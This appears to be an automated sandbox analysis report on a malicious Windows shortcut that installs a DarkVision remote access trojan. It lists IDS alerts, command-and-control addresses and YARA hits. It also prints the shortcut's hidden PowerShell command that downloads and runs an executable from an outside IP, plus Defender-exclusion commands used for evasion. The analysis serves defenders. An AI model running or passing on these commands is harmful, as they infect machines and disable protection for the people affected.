                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:59634 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:59633 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:59631 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:59629 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.8:59629 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:59630 -> 87.121.86.214:3440
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\explorer.exeNetwork Connect: 87.121.86.214 3440Jump to behavior
                            Uses dynamic DNS services
                            Source: unknownDNS query: name: acuweld.ddns.net
                            Source: global trafficTCP traffic: 192.168.2.8:49712 -> 87.121.86.214:3440
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Mon, 30 Dec 2024 10:46:07 GMTAccept-Ranges: bytesETag: "d314618a85adb1:0"Server: Microsoft-IIS/8.5Date: Tue, 31 Dec 2024 08:28:24 GMTContent-Length: 4220416Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1f 20 61 b4 5b 41 0f e7 5b 41 0f e7 5b 41 0f e7 34 37 a4 e7 5f 41 0f e7 40 dc 91 e7 51 41 0f e7 52 39 8c e7 58 41 0f e7 52 39 88 e7 5a 41 0f e7 52 39 9c e7 52 41 0f e7 5b 41 0e e7 25 41 0f e7 40 dc a4 e7 1c 41 0f e7 40 dc a5 e7 32 41 0f e7 40 dc 95 e7 5a 41 0f e7 40 dc 92 e7 5a 41 0f e7 52 69 63 68 5b 41 0f e7 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 4d e4 36 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 7c 03 00 00 e8 03 00 00 00 00 00 00 60 40 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 90 40 00 00 04 00 00 43 62 41 00 02 00 40 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8d 90 07 00 b5 00 00 00 00 80 07 00 f0 02 00 00 20 70 40 00 40 1d 00 00 00 00 00 00 00 00 00 00 f8 91 07 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 07 00 00 10 00 00 00 70 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 02 00 00 00 80 07 00 00 04 00 00 00 80 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 07 00 00 02 00 00 00 84 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 69 6b 6b 71 6f 71 6b 6a 00 c0 38 00 00 a0 07 00 00 c0 38 00 00 86 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 79 77 63 62 6c 64 64 00 10 00 00 00 60 40 00 00 02 00 00 00 46 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 70 64 61 74 61 00 49 00 20 00 00 00 70 40 00 00 1e 00 00 00 48 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: Joe Sandbox ViewASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
                            Source: Joe Sandbox ViewASN Name: SKATTV-ASBG SKATTV-ASBG
                            Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 87.120.113.91:80 -> 192.168.2.8:49708
                            Source: global trafficHTTP traffic detected: GET /image.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 87.120.113.91Connection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: C:\Windows\explorer.exeCode function: 12_2_029E4D00 recv,12_2_029E4D00
                            Source: global trafficHTTP traffic detected: GET /image.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 87.120.113.91Connection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: acuweld.ddns.net
                            Source: powershell.exe, 00000000.00000002.1608375832.000002AD5C10D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.113.91
                            Source: powershell.exe, 00000000.00000002.1607114664.000002AD58E38000.00000004.00000020.00020000.00000000.sdmp, 009274965.lnkString found in binary or memory: http://87.120.113.91/image.exe
                            Source: powershell.exe, 00000000.00000002.1648729326.000002AD73328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                            Source: powershell.exe, 00000000.00000002.1645103934.000002AD6B011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1645103934.000002AD6B154000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 00000000.00000002.1608375832.000002AD5B1D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000000.00000002.1608375832.000002AD5AFA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000000.00000002.1608375832.000002AD5B1D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000000.00000002.1608375832.000002AD5AFA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: powershell.exe, 00000000.00000002.1645103934.000002AD6B154000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 00000000.00000002.1645103934.000002AD6B154000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 00000000.00000002.1645103934.000002AD6B154000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: powershell.exe, 00000000.00000002.1608375832.000002AD5B1D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000000.00000002.1608375832.000002AD5C10D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                            Source: powershell.exe, 00000000.00000002.1645103934.000002AD6B011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1645103934.000002AD6B154000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 7.2.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 18.0.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 3.2.file.exe.7ff7fe2c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 7.0.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 18.2.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 12.2.explorer.exe.29c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 3.0.file.exe.7ff7fe2c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\file.exe, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: C:\ProgramData\windows\windows.exe, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            PE file contains section with special chars
                            Source: file.exe.0.drStatic PE information: section name:
                            Source: file.exe.0.drStatic PE information: section name: .idata
                            Source: windows.exe.3.drStatic PE information: section name:
                            Source: windows.exe.3.drStatic PE information: section name: .idata
                            Powershell drops PE file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\file.exeJump to dropped file
                            Windows shortcut file (LNK) contains suspicious command line arguments
                            Source: 009274965.lnkLNK file: -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile %TEMP%\file.exe; Start-Process '%TEMP%\file.exe' }"
                            Source: C:\Windows\explorer.exeCode function: 12_2_02CFFA9D: SleepEx,CloseHandle,GetVersion,DeviceIoControl,12_2_02CFFA9D
                            Source: C:\Windows\explorer.exeCode function: 12_2_029F021C12_2_029F021C
                            Source: C:\Windows\explorer.exeCode function: 12_2_029DDDD012_2_029DDDD0
                            Source: C:\Windows\explorer.exeCode function: 12_2_029F11C412_2_029F11C4
                            Source: C:\Windows\explorer.exeCode function: 12_2_029E3FF012_2_029E3FF0
                            Source: C:\Windows\explorer.exeCode function: 12_2_029EB57C12_2_029EB57C
                            Source: C:\Windows\explorer.exeCode function: String function: 02A32500 appears 58 times
                            Source: 7.2.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 18.0.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 3.2.file.exe.7ff7fe2c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 7.0.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 18.2.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 12.2.explorer.exe.29c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 3.0.file.exe.7ff7fe2c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: C:\Users\user\AppData\Local\Temp\file.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: C:\ProgramData\windows\windows.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: classification engineClassification label: mal100.troj.expl.evad.winLNK@24/17@2/2
                            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{5CAAC06D-2278-4820-8E02-FD7BF03ADE5D}.lnkJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\ProgramData\windows\windows.exeMutant created: \Sessions\1\BaseNamedObjects\{39165D6A-D5D6-4F3C-B840-43C7C5AD79FF}
                            Source: C:\Users\user\AppData\Local\Temp\file.exeMutant created: \Sessions\1\BaseNamedObjects\{F94EDF39-4D1E-40FF-87E5-9CF3DEFBA10E}
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
                            Source: C:\ProgramData\windows\windows.exeMutant created: \Sessions\1\BaseNamedObjects\{A2D6BFB4-BEE0-4FBC-8665-EE4C067CFD34}
                            Source: C:\ProgramData\windows\windows.exeMutant created: \Sessions\1\BaseNamedObjects\{ABF65F44-5D51-43F0-8491-A4B2622BD1E0}
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1af1zgpl.lmn.ps1Jump to behavior
                            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\{43FE0128-8195-4F1C-ADAF-97085D2B6441}\{323467A8-45DA-47D5-AF53-60BD8A3D7BCB}.bat" "
                            Source: C:\ProgramData\windows\windows.exeProcess created: C:\Windows\explorer.exe
                            Source: C:\ProgramData\windows\windows.exeProcess created: C:\Windows\explorer.exeJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                            Source: 009274965.lnkReversingLabs: Detection: 28%
                            Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: file.exeString found in binary or memory: {DCFD55AC-9FE5-4D09-A241-ADDCC931CC7D}
                            Source: windows.exeString found in binary or memory: {DCFD55AC-9FE5-4D09-A241-ADDCC931CC7D}
                            Source: windows.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: explorer.exeString found in binary or memory: {DCFD55AC-9FE5-4D09-A241-ADDCC931CC7D}
                            Source: explorer.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe"
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\ProgramData\windows\windows.exe "C:\ProgramData\windows\windows.exe" {05756468-6434-465A-9313-8CAA82F857B2}
                            Source: C:\ProgramData\windows\windows.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'
                            Source: C:\ProgramData\windows\windows.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\{43FE0128-8195-4F1C-ADAF-97085D2B6441}\{323467A8-45DA-47D5-AF53-60BD8A3D7BCB}.bat" "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c start "" "C:\ProgramData\windows\windows.exe" {E18E5DB7-AE08-4C9E-ABE2-E82E89BF186D}
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\windows\windows.exe "C:\ProgramData\windows\windows.exe" {E18E5DB7-AE08-4C9E-ABE2-E82E89BF186D}
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\ProgramData\windows\windows.exe "C:\ProgramData\windows\windows.exe" {05756468-6434-465A-9313-8CAA82F857B2}Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'Jump to behavior
                            Source: C:\ProgramData\windows\windows.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'Jump to behavior
                            Source: C:\ProgramData\windows\windows.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c start "" "C:\ProgramData\windows\windows.exe" {E18E5DB7-AE08-4C9E-ABE2-E82E89BF186D}Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\windows\windows.exe "C:\ProgramData\windows\windows.exe" {E18E5DB7-AE08-4C9E-ABE2-E82E89BF186D}Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
